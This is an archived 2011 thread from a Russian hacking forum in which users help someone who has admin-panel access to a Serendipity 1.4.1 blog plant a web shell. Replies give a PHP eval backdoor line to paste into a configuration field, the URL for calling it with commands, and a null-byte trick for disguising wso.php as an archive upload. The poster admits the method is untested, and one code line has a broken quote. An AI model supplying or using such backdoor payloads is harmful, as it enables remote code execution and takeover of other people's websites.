ANTICHAT - Заливка веб-шелла через админку

ANTICHAT (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - Заливка веб-шелла через админку (https://forum.antichat.xyz/showthread.php?t=305724)

Pirotexnik

29.11.2011 00:38

Доброго времени суток.

Есть доступ в админку Serendipity 1.4.1.

Нету возможгости заливать "активные файлы".

Перепробовал кучу вариантов с нуль-байтом, кавычками и тп.

Не вышло.

Смог залить запакованую версию wso.php.gz

Есть какой нить вариант залить рабочий шелл?

tabletkO

29.11.2011 06:40

Пробуй через конфиг:

eval(stripslashes($_POST[cmd']));

OxoTnik

29.11.2011 11:40

wso.php%00.gz --> wso.php

сорь не уследил за твойм текстом, про нул байт.

Pirotexnik

29.11.2011 17:34

Цитата:

Сообщение от tabletkO

Пробуй через конфиг:
eval(stripslashes($_POST[cmd']));

Нету доступа к консоле. Есть только доступ в админку блога на сайте.

tabletkO

29.11.2011 17:41

Через админку:

Adminstration => Configuration

Там много параметров, в одну "маловажную" ставишь свой шелл-код, в нашем случае:

eval(stripslashes($_GET[cmd']));

Потом, по идее, шелл должен быть по адресу:

http://site.ru/serendipity_config_local.inc.php?cmd=phpinfo();

P.S. Не тестил =)

Pirotexnik

29.11.2011 17:45

Цитата:

Сообщение от None

Access forbidden!

Набранное вами сообщение слишком короткое. Увеличьте ваше сообщение до 4 символов.

Время: 18:55